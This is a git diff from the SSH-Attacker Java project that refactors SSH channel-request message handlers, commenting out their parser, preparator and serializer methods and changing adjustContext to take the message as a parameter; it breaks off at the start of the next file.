a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java index 49f8205e4..0ac4311eb 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestAuthAgentMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestAuthAgentMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestAuthAgentMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestAuthAgentMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestAuthAgentMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestAuthAgentMessageHandler @@ -22,19 +19,19 @@ public ChannelRequestAuthAgentMessageHandler(SshContext context) { super(context); } - public ChannelRequestAuthAgentMessageHandler( + /*public ChannelRequestAuthAgentMessageHandler( SshContext context, ChannelRequestAuthAgentMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestAuthAgentMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestAuthAgentMessageParser getParser(byte[] array) { return new ChannelRequestAuthAgentMessageParser(array); } @@ -52,5 +49,5 @@ public ChannelRequestAuthAgentMessagePreparator getPreparator() { @Override public ChannelRequestAuthAgentMessageSerializer getSerializer() { return new ChannelRequestAuthAgentMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java index 5735211cc..745b5af7a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestBreakMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestBreakMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestBreakMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestBreakMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestBreakMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestBreakMessageHandler @@ -21,12 +18,12 @@ public ChannelRequestBreakMessageHandler(SshContext context) { super(context); } - public ChannelRequestBreakMessageHandler( + /*public ChannelRequestBreakMessageHandler( SshContext context, ChannelRequestBreakMessage message) { super(context, message); - } + }*/ - @Override + /*@Override public ChannelRequestBreakMessageParser getParser(byte[] array) { return new ChannelRequestBreakMessageParser(array); } @@ -44,10 +41,10 @@ public ChannelRequestBreakMessagePreparator getPreparator() { @Override public ChannelRequestBreakMessageSerializer getSerializer() { return new ChannelRequestBreakMessageSerializer(message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestBreakMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java index 72eb16c8f..3c11e63e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestEnvMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestEnvMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestEnvMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestEnvMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestEnvMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestEnvMessageHandler extends SshMessageHandler { @@ -21,18 +18,18 @@ public ChannelRequestEnvMessageHandler(SshContext context) { super(context); } - public ChannelRequestEnvMessageHandler(SshContext context, ChannelRequestEnvMessage message) { + /*public ChannelRequestEnvMessageHandler(SshContext context, ChannelRequestEnvMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestEnvMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestEnvMessageParser getParser(byte[] array) { return new ChannelRequestEnvMessageParser(array); } @@ -50,5 +47,5 @@ public ChannelRequestEnvMessagePreparator getPreparator() { @Override public ChannelRequestEnvMessageSerializer getSerializer() { return new ChannelRequestEnvMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java index f18e5dedf..e8989279e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExecMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestExecMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestExecMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestExecMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestExecMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestExecMessageHandler extends SshMessageHandler { @@ -21,19 +18,20 @@ public ChannelRequestExecMessageHandler(SshContext context) { super(context); } - public ChannelRequestExecMessageHandler(SshContext context, ChannelRequestExecMessage message) { + /*public ChannelRequestExecMessageHandler(SshContext context, ChannelRequestExecMessage message) { super(context, message); } + */ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestExecMessage message) { // TODO: Handle ChannelRequestExecMessage if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new ChannelRequestExecMessageParser(array); } @@ -51,5 +49,5 @@ public ChannelRequestExecMessagePreparator getPreparator() { @Override public ChannelRequestExecMessageSerializer getSerializer() { return new ChannelRequestExecMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java index d327a6a88..f17d269d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitSignalMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestExitSignalMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestExitSignalMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestExitSignalMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestExitSignalMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestExitSignalMessageHandler @@ -22,19 +19,19 @@ public ChannelRequestExitSignalMessageHandler(SshContext context) { super(context); } - public ChannelRequestExitSignalMessageHandler( + /*public ChannelRequestExitSignalMessageHandler( SshContext context, ChannelRequestExitSignalMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestExitSignalMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestExitSignalMessageParser getParser(byte[] array) { return new ChannelRequestExitSignalMessageParser(array); } @@ -52,5 +49,5 @@ public ChannelRequestExitSignalMessagePreparator getPreparator() { @Override public ChannelRequestExitSignalMessageSerializer getSerializer() { return new ChannelRequestExitSignalMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java index 949e9c33a..9ff8adc05 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestExitStatusMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestExitStatusMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestExitStatusMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestExitStatusMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestExitStatusMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestExitStatusMessageHandler @@ -22,7 +19,7 @@ public ChannelRequestExitStatusMessageHandler(SshContext context) { super(context); } - public ChannelRequestExitStatusMessageHandler( + /*public ChannelRequestExitStatusMessageHandler( SshContext context, ChannelRequestExitStatusMessage message) { super(context, message); } @@ -45,10 +42,10 @@ public ChannelRequestExitStatusMessagePreparator getPreparator() { @Override public ChannelRequestExitStatusMessageSerializer getSerializer() { return new ChannelRequestExitStatusMessageSerializer(message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestExitStatusMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java index 8b30c5829..4d1366055 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestPtyMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestPtyMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestPtyMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestPtyMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestPtyMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestPtyMessageHandler extends SshMessageHandler { @@ -21,18 +18,18 @@ public ChannelRequestPtyMessageHandler(SshContext context) { super(context); } - public ChannelRequestPtyMessageHandler(SshContext context, ChannelRequestPtyMessage message) { + /*public ChannelRequestPtyMessageHandler(SshContext context, ChannelRequestPtyMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestPtyMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestPtyMessageParser getParser(byte[] array) { return new ChannelRequestPtyMessageParser(array); } @@ -50,5 +47,5 @@ public ChannelRequestPtyMessagePreparator getPreparator() { @Override public ChannelRequestPtyMessageSerializer getSerializer() { return new ChannelRequestPtyMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java index 2c48316e7..2ef5796e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestShellMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestShellMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestShellMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestShellMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestShellMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestShellMessageHandler @@ -22,19 +19,19 @@ public ChannelRequestShellMessageHandler(SshContext context) { super(context); } - public ChannelRequestShellMessageHandler( + /*public ChannelRequestShellMessageHandler( SshContext context, ChannelRequestShellMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestShellMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestShellMessageParser getParser(byte[] array) { return new ChannelRequestShellMessageParser(array); } @@ -52,5 +49,5 @@ public ChannelRequestShellMessagePreparator getPreparator() { @Override public ChannelRequestShellMessageSerializer getSerializer() { return new ChannelRequestShellMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java index 643402427..b603a31a5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSignalMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestSignalMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestSignalMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestSignalMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestSignalMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestSignalMessageHandler @@ -22,19 +19,19 @@ public ChannelRequestSignalMessageHandler(SshContext context) { super(context); } - public ChannelRequestSignalMessageHandler( + /*public ChannelRequestSignalMessageHandler( SshContext context, ChannelRequestSignalMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestSignalMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestSignalMessageParser getParser(byte[] array) { return new ChannelRequestSignalMessageParser(array); } @@ -52,5 +49,5 @@ public ChannelRequestSignalMessagePreparator getPreparator() { @Override public ChannelRequestSignalMessageSerializer getSerializer() { return new ChannelRequestSignalMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java index 00452cc4a..667911504 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestSubsystemMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestSubsystemMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestSubsystemMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestSubsystemMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestSubsystemMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestSubsystemMessageHandler @@ -21,19 +18,19 @@ public ChannelRequestSubsystemMessageHandler(SshContext context) { super(context); } - public ChannelRequestSubsystemMessageHandler( + /*public ChannelRequestSubsystemMessageHandler( SshContext context, ChannelRequestSubsystemMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestSubsystemMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestSubsystemMessageParser getParser(byte[] array) { return new ChannelRequestSubsystemMessageParser(array); } @@ -51,5 +48,5 @@ public ChannelRequestSubsystemMessagePreparator getPreparator() { @Override public ChannelRequestSubsystemMessageSerializer getSerializer() { return new ChannelRequestSubsystemMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java index 744818620..d8349e5da 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestUnknownMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestUnknownMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestUnknownMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestUnknownMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestUnknownMessageHandler @@ -22,19 +19,19 @@ public ChannelRequestUnknownMessageHandler(SshContext context) { super(context); } - public ChannelRequestUnknownMessageHandler( + /*public ChannelRequestUnknownMessageHandler( SshContext context, ChannelRequestUnknownMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestUnknownMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } } - @Override + /*@Override public ChannelRequestUnknownMessageParser getParser(byte[] array) { return new ChannelRequestUnknownMessageParser(array); } @@ -52,5 +49,5 @@ public ChannelRequestUnknownMessagePreparator getPreparator() { @Override public ChannelRequestUnknownMessageSerializer getSerializer() { return new ChannelRequestUnknownMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java index 9db058bc5..0c6f073e8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestWindowChangeMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestWindowChangeMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestWindowChangeMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestWindowChangeMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestWindowChangeMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestWindowChangeMessageHandler @@ -21,7 +18,7 @@ public ChannelRequestWindowChangeMessageHandler(SshContext context) { super(context); } - public ChannelRequestWindowChangeMessageHandler( + /*public ChannelRequestWindowChangeMessageHandler( SshContext context, ChannelRequestWindowChangeMessage message) { super(context, message); } @@ -44,10 +41,10 @@ public ChannelRequestWindowChangeMessagePreparator getPreparator() { @Override public ChannelRequestWindowChangeMessageSerializer getSerializer() { return new ChannelRequestWindowChangeMessageSerializer(message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestWindowChangeMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java index 60765b436..5064a8f2e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestX11MessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestX11Message; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestX11MessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestX11MessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestX11MessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestX11MessageHandler extends SshMessageHandler { @@ -20,7 +17,7 @@ public ChannelRequestX11MessageHandler(SshContext context) { super(context); } - public ChannelRequestX11MessageHandler(SshContext context, ChannelRequestX11Message message) { + /*public ChannelRequestX11MessageHandler(SshContext context, ChannelRequestX11Message message) { super(context, message); } @@ -42,10 +39,10 @@ public ChannelRequestX11MessagePreparator getPreparator() { @Override public ChannelRequestX11MessageSerializer getSerializer() { return new ChannelRequestX11MessageSerializer(message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestX11Message message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java index 1393a2c45..c200e169b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelRequestXonXoffMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelRequestXonXoffMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelRequestXonXoffMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelRequestXonXoffMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelRequestXonXoffMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.util.Converter; public class ChannelRequestXonXoffMessageHandler @@ -22,7 +19,7 @@ public ChannelRequestXonXoffMessageHandler(SshContext context) { super(context); } - public ChannelRequestXonXoffMessageHandler( + /*public ChannelRequestXonXoffMessageHandler( SshContext context, ChannelRequestXonXoffMessage message) { super(context, message); } @@ -45,10 +42,10 @@ public ChannelRequestXonXoffMessagePreparator getPreparator() { @Override public ChannelRequestXonXoffMessageSerializer getSerializer() { return new ChannelRequestXonXoffMessageSerializer(message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelRequestXonXoffMessage message) { if (Converter.byteToBoolean(message.getWantReply().getValue())) { context.getChannelManager().addToChannelRequestResponseQueue(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelSuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelSuccessMessageHandler.java index 826b8a705..5d3abe8ba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelSuccessMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelSuccessMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelSuccessMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelSuccessMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelSuccessMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelSuccessMessageHandler extends SshMessageHandler { @@ -20,16 +17,16 @@ public ChannelSuccessMessageHandler(SshContext context) { super(context); } - public ChannelSuccessMessageHandler(SshContext context, ChannelSuccessMessage message) { + /*public ChannelSuccessMessageHandler(SshContext context, ChannelSuccessMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelSuccessMessage message) { // TODO: Handle ChannelSuccessMessage } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new ChannelSuccessMessageParser(array); } @@ -47,5 +44,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new ChannelMessageSerializer<>(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java index 2d33da52d..ae7f68966 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java +++ 